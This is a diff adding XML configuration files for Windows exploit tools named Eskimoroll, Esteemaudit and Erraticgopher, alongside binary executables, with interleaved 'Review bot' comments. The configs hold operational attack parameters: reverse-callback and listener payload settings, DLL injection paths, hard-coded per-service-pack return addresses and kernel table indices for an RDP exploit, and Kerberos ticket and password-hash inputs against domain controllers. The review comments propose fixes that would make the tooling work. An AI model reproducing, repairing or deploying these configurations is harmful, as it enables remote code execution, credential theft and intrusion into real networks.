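+type="Socket"/>
+</t:outputparameters>
+
+<t:redirection>
+<t:local protocol="TCP"
+listenaddr="TargetIp"
+listenport="TargetPort"
+destaddr="//identifier"
+destport="//service[name='rpc']/port"
+closeoncompletion="true"/>
+<t:local protocol="TCP"
+listenaddr="TargetIp"
+listenport="CallbackPort"
+destaddr="//identifier"
+destport="CallbackPort"
+closeoncompletion="true"/>
+<t:remote protocol="TCP"
+listenaddr="CallbackIp"
+listenport="CallbackPort"
+destport="CallbackPort"/>
+</t:redirection>
+
+<t:logic>
+<t:and>
+<t:service name="rpc">
+<t:bindtopath name="TargetPort" path="//service[name='rpc']/port"/>
+</t:service>
+<t:or>
+<!--
+<t:os family="windows" name="Windows XP" servicepack="0">
+<t:bindtovalue name="Target" value="XPSP0"/>
+</t:os>
+<t:os family="windows" name="Windows XP" servicepack="1">
+<t:bindtovalue name="Target" value="XPSP1"/>
+</t:os>
+<t:os family="windows" name="Windows XP" servicepack="2">
+<t:bindtovalue name="Target" value="XPSP2"/>
+</t:os>
+-->
+<t:os family="windows" name="Windows XP" servicepack="3">
+<t:bindtovalue name="Target" value="XPSP3"/>
+</t:os>
+<t:os family="windows" name="Windows 2003" servicepack="0">
+<t:bindtovalue name="Target" value="W2K3SP0"/>
+</t:os>
+<t:os family="windows" name="Windows 2003" servicepack="1">
+<t:bindtovalue name="Target" value="W2K3SP1"/>
+</t:os>
+<t:os family="windows" name="Windows 2003" servicepack="2">
+<t:bindtovalue name="Target" value="W2K3SP2"/>
+</t:os>
+</t:or>
+<t:not>
+<t:os architecture="x86 64-bit"/>
+</t:not>
+<t:bindtovalue name="Payload" value="Callback"/>
+</t:and>
+</t:logic>
+
+</t:config>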
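Review bot: The `<t:remote protocol="TCP" listenaddr="CallbackIp" ...>` redirection references CallbackIp, which is declared only inside ConnectionDirection paramgroup "0" (Reverse callback); paramgroup "1" (Forward callback) is empty, so selecting it leaves the remote redirector with no bound listen address and declares no port for the egg to listen on. The logic block's `<t:bindtovalue name="Payload" value="Callback"/>` likewise binds a Payload parameter that inputparameters never declares, whereas the Esteemaudit config in this commit declares Payload as a paramchoice with Callback and Listener groups. Either add the Forward-callback parameters and a declared Payload choice, or remove the empty paramgroup so that mode cannot be selected. The commented-out WINXP_SP2 block records that exploitation disables the RRAS service because the lock handle cannot be cleaned up; if that target is ever re-enabled, that denial-of-service side effect belongs in the paramgroup description where an operator will see it, not only in a comment.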
BIN
windows/exploits/Erraticgopher-1.0.1.exe
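--- /dev/null
+++ b/windows/exploits/Eskimoroll-1.1.1.0.fb
@@ -0,0 +1,21 @@
+<?xml version="1.0"?>
+<t:config id="b312630cfabfbb7572a55a75e213eff54be451e1"
+name="Eskimoroll"
+version="1.1.1"
+configversion="1.1.1.0"
+xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
+xmlns:t='tc0'>
+
+<t:touchlist>
+<t:plugin name="Domaintouch"
+displayname="Domain Touch"
+description="Eskimoroll domain information touch">
+<t:oparam name="DomainDns" value="DomainDns"/>
+<t:oparam name="DomainSid" value="DomainSid"/>
+<t:oparam name="CredentialType" value="CredentialType"/>
+<t:oparam name="Credential" value="Credential"/>
+<t:oparam name="Username" value="Username"/>
+</t:plugin>
+</t:touchlist>
+
+</t:config>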
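--- /dev/null
+++ b/windows/exploits/Eskimoroll-1.1.1.0.xml
@@ -0,0 +1,148 @@
+<?xml version="1.0"?>
+<t:config id="b312630cfabfbb7572a55a75e213eff54be451e1"
+name="Eskimoroll"
+version="1.1.1"
+configversion="1.1.1.0"
+xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
+xmlns:t='tc0'>
+
+<t:inputparameters>
+<t:parameter name="NetworkTimeout"
+description="Timeout for blocking network calls (in seconds)"
+type="S16"
+default="60"/>
+<t:parameter name="TargetIp"
+description="Domain Controller's IP address"
+type="IPv4"
+binding="//identifier"/>
+<t:parameter name="TargetPort"
+description="Port used by the Kerberos service"
+type="TcpPort"
+binding="//service[name='kerberos']/port"
+default="88"/>
+
+<t:parameter name="Delay"
+description="Time to wait between packets (in seconds)"
+type="S32"
+default="0"/>
+<t:parameter name="TicketFile"
+description="Local file to store ticket (leave blank for in-memory only)"
+type="String"
+default=""/>
+
+<t:parameter name="TargetMachine"
+description="Target's NetBIOS name (in Unicode)"
+type="UString"/>
+<t:parameter name="DomainDns"
+description="DNS name of the domain being exploited (in Unicode)"
+type="UString"/>
+<t:parameter name="DomainSid"
+description="SID of the domain being exploited (e.g., S-1-5-21-XXXX-XXXX)"
+type="String"/>
+
+<t:paramchoice name="CredentialType"
+description="Password, password hash, ticket, etc">
+<t:paramgroup name="UnicodeCreds"
+description="Unicode encoded credentials">
+<t:parameter name="Username"
+description="Username entered as hex bytes (in Unicode)"
+type="UString"/>
+<t:parameter name="Credential"
+description="Unicode password entered as hex bytes (in Unicode)"
+type="UString"/>
+</t:paramgroup>
+<t:paramgroup name="PasswordHash"
+description="Password hash">
+<t:parameter name="Username"
+description="Username entered as hex bytes (in Unicode)"
+type="UString"/>
+<t:parameter name="Credential"
+description="Hash of user/machine password entered as hex bytes"
+type="UString"/>
+</t:paramgroup>
+<t:paramgroup name="MachineHash"
+description="Credentials for the domain computer, obtained from lsadump">
+<t:parameter name="Username"
+description="Machine's name, with trailing '$' character, in UNICODE"
+type="UString"/>
+<t:parameter name="Credential"
+description="Machine hash obtained from lsadump, entered as HEX bytes."
+type="UString"/>
+</t:paramgroup>
+</t:paramchoice>
+</t:inputparameters>
+
+<t:outputparameters>
+<t:paramchoice name="CredentialType"
+description="Password, password hash, ticket, etc">
+<t:paramgroup name="UnicodeCreds"
+description="Unicode encoded credentials">
+<t:parameter name="Username"
+description="Username entered as hex bytes (in Unicode)"
+type="UString"/>
+<t:parameter name="Credential"
+description="Unicode password entered as hex bytes (in Unicode)"
+type="UString"/>
+</t:paramgroup>
+<t:paramgroup name="PasswordHash"
+description="Password hash">
+<t:parameter name="Username"
+description="Username entered as hex bytes (in Unicode)"
+type="UString"/>
+<t:parameter name="Credential"
+description="Hash of user/machine password entered as hex bytes"
+type="UString"/>
+</t:paramgroup>
+<t:paramgroup name="MachineHash"
+description="Credentials for the domain computer, obtained from lsadump">
+<t:parameter name="Username"
+description="Machine's name, with trailing '$' character, in UNICODE"
+type="UString"/>
+<t:parameter name="Credential"
+description="Machine hash obtained from lsadump, entered as HEX bytes."
+type="UString"/>
+</t:paramgroup>
+
+<t:paramgroup name="KerberosTicket"
+description="Kerberos ticket for target machine">
+<t:parameter name="Username"
+description="Name of the user who owns the Kerberos ticket (in Unicode)"
+type="UString"/>
+<t:parameter name="DomainDns"
+description="DNS name of the domain being exploited (in Unicode)"
+type="UString"/>
+<t:parameter name="KerberosTicket"
+description="Kerberos ticket with necessary privileges"
+type="UString"/>
+<t:parameter name="SessionKey"
+description="Encryption key used in the Kerberos ticket"
+type="UString"/>
+</t:paramgroup>
+<t:paramgroup name="KerberosFile"
+description="Kerberos ticket from disk">
+<t:parameter name="TicketFile"
+description="Local file holding Kerberos ticket"
+type="LocalFile"/>
+</t:paramgroup>
+</t:paramchoice>
+</t:outputparameters>
+
+<t:redirection>
+<t:local protocol="TCP"
+listenaddr="TargetIp"
+listenport="TargetPort"
+destaddr="//identifier"
+destport="//service[name='smb']/port"
+closeoncompletion="true"/>
+</t:redirection>
+
+<t:logic>
+<t:or>
+<t:os family="windows" name="Windows 2000" osclass="Server"/>
+<t:os family="windows" name="Windows 2003"/>
+<t:os family="windows" name="Windows 2003 R2"/>
+<t:os family="windows" name="Windows 2008"/>
+<t:os family="windows" name="Windows 2008 R2" version="Free"/>
+</t:or>
+</t:logic>
+</t:config>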
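Review bot: The `<t:redirection>` entry listens on TargetPort, which is bound to `//service[name='kerberos']/port` with `default="88"`, but forwards to `destport="//service[name='smb']/port"`, so under redirection the Kerberos exchange would be delivered to the target's SMB port. Unless the binary deliberately tunnels over SMB (nothing in this file says so), this should read `destport="//service[name='kerberos']/port"`. The input TicketFile is a plain `String` while the output KerberosFile group types it as `LocalFile`; using `LocalFile` on both sides lets the framework validate the path instead of passing an arbitrary string to the binary. TicketFile also persists a forged ticket (and presumably its session key, given the SessionKey output) on the operator's disk, so its description should warn that the file is sensitive material to be removed after use.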
BIN
windows/exploits/Eskimoroll-1.1.1.exe
866
windows/exploits/Esteemaudit-2.1.0.0.xml
Normal file
866
windows/exploits/Esteemaudit-2.1.0.0.xml
Normal file
|
@ -0,0 +1,866 @@
|
|||
<?xml version='1.0' encoding='utf-8'?>
|
||||
<config xmlns='urn:trch' name='Esteemaudit' version='2.1.0' schemaversion='2.1.0' configversion='2.1.0.0' id='2a7d82545aa7bdf8b44ee403dbebf2b360f55b3a'>
|
||||
<inputparameters>
|
||||
<parameter type='IPv4' name='TargetIp' description='Target IP Address'/>
|
||||
<parameter type='TcpPort' name='TargetPort' description='Port used by the RDP service'>
|
||||
<default>3389</default>
|
||||
</parameter>
|
||||
<parameter type='S16' name='NetworkTimeout' description='Timeout for connect() calls including egg callback'>
|
||||
<default>60</default>
|
||||
</parameter>
|
||||
<parameter type='S16' name='PacketTimeout' description='Timeout for each RDP packet.'>
|
||||
<default>10</default>
|
||||
</parameter>
|
||||
<parameter type='U32' name='MaxProcessCount' description='The maximum number of RDP process loops to allow'>
|
||||
<default>300</default>
|
||||
</parameter>
|
||||
<parameter type='U32' name='RdpLibHertz' description='Extrapolated RdpLib processing cycles per second.'>
|
||||
<default>30</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='Boolean' name='SendSpacebar' description='Whether to send spacebar to clear legal text caption or not'>
|
||||
<default>true</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ProcessCountToSendSpaceOn' description='Process loop to clear the legal text caption on'>
|
||||
<default>3</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='MaxRDPLibErrorCount' description='Maximum number of RDPLib errors to allow'>
|
||||
<default>3</default>
|
||||
</parameter>
|
||||
<paramchoice name='Payload' description='How the egg will behave'>
|
||||
<default>Callback</default>
|
||||
<paramgroup name='Callback' description='The egg will callback to the specified IP and Port'>
|
||||
<parameter type='IPv4' name='CallbackIp' description='Callback IP address the egg will connect to from target'/>
|
||||
<parameter type='TcpPort' name='CallbackPort' description='Callback port that the egg will connect to from target'>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter required='false' type='TcpPort' name='CallbackLocalPort' description='Callback port that we will listen on to receive the eggs connection'/>
|
||||
</paramgroup>
|
||||
<paramgroup name='Listener' description='The egg will open up a new listening port.'>
|
||||
<parameter type='TcpPort' name='ListenPort' description='Port the egg will listen on'/>
|
||||
<parameter required='false' type='TcpPort' name='CallinPort' description='Port we connect to'/>
|
||||
</paramgroup>
|
||||
</paramchoice>
|
||||
<paramchoice name='Architecture' description='Architecture of the target'>
|
||||
<paramgroup name='x86' description='Target is running on an x86 processor'>
|
||||
<parameter type='LocalFile' name='MigrateProcessDLL' description=' The DLL that will be used to inject into a remote process'>
|
||||
<default>D:\DSZOPSDISK\storage\rudo_x86.dll</default>
|
||||
</parameter>
|
||||
<parameter type='LocalFile' name='CallbackPayloadDLL' description='The DLL that will be used as a callback payload'>
|
||||
<default>D:\DSZOPSDISK\storage\capa_x86.dll</default>
|
||||
</parameter>
|
||||
<parameter type='LocalFile' name='ListenPayloadDLL' description='The DLL that will be used as a listen payload'>
|
||||
<default>D:\DSZOPSDISK\storage\lipa_x86.dll</default>
|
||||
</parameter>
|
||||
<paramchoice name='Target' description='OS and Service pack of the target'>
|
||||
<paramgroup name='XPSP0' description='Windows XP SP0'>
|
||||
<parameter hidden='true' type='U32' name='GlobalBufAddr' description=''>
|
||||
<default>0x0fe370b0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret0c' description=''>
|
||||
<default>0x0fe37120</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret10' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret04' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret08' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret20' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret28' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret40' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret44' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sysenterIndex' description=''>
|
||||
<default>0x0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='jmpEbx' description=''>
|
||||
<default>0x0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sizeOffest' description=''>
|
||||
<default>0x0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='secondStageAddress' description=''>
|
||||
<default>0x0FE372B0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='provContAddress' description=''>
|
||||
<default>0x0FF94DB0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardTransmitAddress' description=''>
|
||||
<default>0x0FE21178</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardT0PciAddress' description=''>
|
||||
<default>0x0FE211A8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtAllocateVirtualMemory_Index' description='Index of NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000011</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtAllocateVirtualMemory_ArgSize' description='Size of stack arguments to NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x18</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtFreeVirtualMemory_Index' description='Index of NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000053</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtFreeVirtualMemory_ArgSize' description='Size of stack arguments to NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x10</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='XPSP1' description='Windows XP SP1'>
|
||||
<parameter hidden='true' type='U32' name='GlobalBufAddr' description=''>
|
||||
<default>0x0fe370b0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret0c' description=''>
|
||||
<default>0x0fe37120</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret10' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret04' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret08' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret20' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret28' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret40' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret44' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sysenterIndex' description=''>
|
||||
<default>0x0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='jmpEbx' description=''>
|
||||
<default>0x0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sizeOffest' description=''>
|
||||
<default>0x0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='secondStageAddress' description=''>
|
||||
<default>0x0FE372B0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='provContAddress' description=''>
|
||||
<default>0x0FF94DB0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardTransmitAddress' description=''>
|
||||
<default>0x0FE21178</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardT0PciAddress' description=''>
|
||||
<default>0x0FE211A8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtAllocateVirtualMemory_Index' description='Index of NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000011</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtAllocateVirtualMemory_ArgSize' description='Size of stack arguments to NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x18</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtFreeVirtualMemory_Index' description='Index of NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000053</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtFreeVirtualMemory_ArgSize' description='Size of stack arguments to NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x10</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='XPSP0|1' description='Windows XP SP0 or SP1'>
|
||||
<parameter hidden='true' type='U32' name='GlobalBufAddr' description=''>
|
||||
<default>0x0fe370b0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret0c' description=''>
|
||||
<default>0x0fe37120</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret10' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret04' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret08' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret20' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret28' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret40' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret44' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sysenterIndex' description=''>
|
||||
<default>0x0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='jmpEbx' description=''>
|
||||
<default>0x0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sizeOffest' description=''>
|
||||
<default>0x0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='secondStageAddress' description=''>
|
||||
<default>0x0FE372B0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='provContAddress' description=''>
|
||||
<default>0x0FF94DB0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardTransmitAddress' description=''>
|
||||
<default>0x0FE21178</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardT0PciAddress' description=''>
|
||||
<default>0x0FE211A8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtAllocateVirtualMemory_Index' description='Index of NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000011</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtAllocateVirtualMemory_ArgSize' description='Size of stack arguments to NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x18</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtFreeVirtualMemory_Index' description='Index of NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000053</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtFreeVirtualMemory_ArgSize' description='Size of stack arguments to NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x10</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='XPSP2' description='Windows XP SP2'>
|
||||
<parameter hidden='true' type='U32' name='GlobalBufAddr' description=''>
|
||||
<default>0x0fe370b0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret0c' description=''>
|
||||
<default>0x0fe25158</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret10' description=''>
|
||||
<default>0x0fe2ab2d</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret04' description=''>
|
||||
<default>0x0fe27243</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret08' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret20' description=''>
|
||||
<default>0x0fe27243</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret28' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret40' description=''>
|
||||
<default>0x0fe266b8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret44' description=''>
|
||||
<default>0x00004000</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sysenterIndex' description=''>
|
||||
<default>0x00000089</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='jmpEbx' description=''>
|
||||
<default>0x0fe3342a</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sizeOffest' description=''>
|
||||
<default>0x44</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='secondStageAddress' description=''>
|
||||
<default>0x0FE372B0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='provContAddress' description=''>
|
||||
<default>0x0FF94DB0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardTransmitAddress' description=''>
|
||||
<default>0x0FE21178</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardT0PciAddress' description=''>
|
||||
<default>0x0FE211A8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtAllocateVirtualMemory_Index' description='Index of NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000011</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtAllocateVirtualMemory_ArgSize' description='Size of stack arguments to NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x18</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtFreeVirtualMemory_Index' description='Index of NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000053</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtFreeVirtualMemory_ArgSize' description='Size of stack arguments to NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x10</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='XPSP3' description='Windows XP SP3'>
|
||||
<parameter hidden='true' type='U32' name='GlobalBufAddr' description=''>
|
||||
<default>0x0fe370b0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret0c' description=''>
|
||||
<default>0x0fe25158</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret10' description=''>
|
||||
<default>0x0fe2ab2d</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret04' description=''>
|
||||
<default>0x0fe27243</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret08' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret20' description=''>
|
||||
<default>0x0fe27243</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret28' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret40' description=''>
|
||||
<default>0x0fe266b8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret44' description=''>
|
||||
<default>0x00004000</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sysenterIndex' description=''>
|
||||
<default>0x00000089</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='jmpEbx' description=''>
|
||||
<default>0x0fe3342a</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sizeOffest' description=''>
|
||||
<default>0x44</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='secondStageAddress' description=''>
|
||||
<default>0x0FE372B0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='provContAddress' description=''>
|
||||
<default>0x0FF94DB0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardTransmitAddress' description=''>
|
||||
<default>0x0FE21178</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardT0PciAddress' description=''>
|
||||
<default>0x0FE211A8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtAllocateVirtualMemory_Index' description='Index of NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000011</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtAllocateVirtualMemory_ArgSize' description='Size of stack arguments to NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x18</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtFreeVirtualMemory_Index' description='Index of NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000053</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtFreeVirtualMemory_ArgSize' description='Size of stack arguments to NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x10</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='XPSP2|3' description='Windows XP SP2 or SP3'>
|
||||
<parameter hidden='true' type='U32' name='GlobalBufAddr' description=''>
|
||||
<default>0x0fe370b0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret0c' description=''>
|
||||
<default>0x0fe25158</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret10' description=''>
|
||||
<default>0x0fe2ab2d</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret04' description=''>
|
||||
<default>0x0fe27243</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret08' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret20' description=''>
|
||||
<default>0x0fe27243</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret28' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret40' description=''>
|
||||
<default>0x0fe266b8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret44' description=''>
|
||||
<default>0x00004000</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sysenterIndex' description=''>
|
||||
<default>0x00000089</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='jmpEbx' description=''>
|
||||
<default>0x0fe3342a</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='sizeOffest' description=''>
|
||||
<default>0x44</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='secondStageAddress' description=''>
|
||||
<default>0x0FE372B0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='provContAddress' description=''>
|
||||
<default>0x0FF94DB0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardTransmitAddress' description=''>
|
||||
<default>0x0FE21178</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='scardT0PciAddress' description=''>
|
||||
<default>0x0FE211A8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtAllocateVirtualMemory_Index' description='Index of NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000011</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtAllocateVirtualMemory_ArgSize' description='Size of stack arguments to NtAllocateVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x18</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='KiServiceTable_NtFreeVirtualMemory_Index' description='Index of NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x00000053</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U16' name='KiServiceTable_NtFreeVirtualMemory_ArgSize' description='Size of stack arguments to NtFreeVirtualMemory() in nt!KiServiceTable'>
|
||||
<default>0x10</default>
|
||||
</parameter>
|
||||
</paramgroup>
|
||||
<paramgroup name='W2K3SP0' description='Windows 2003 SP0'>
|
||||
<parameter hidden='true' type='U32' name='GlobalBufAddr' description=''>
|
||||
<default>0x0fe380f8</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret0c' description=''>
|
||||
<default>0x0fe38168</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret10' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret04' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret08' description=''>
|
||||
<default>0</default>
|
||||
</parameter>
|
||||
<parameter hidden='true' type='U32' name='ret20' description=''>
|
||||
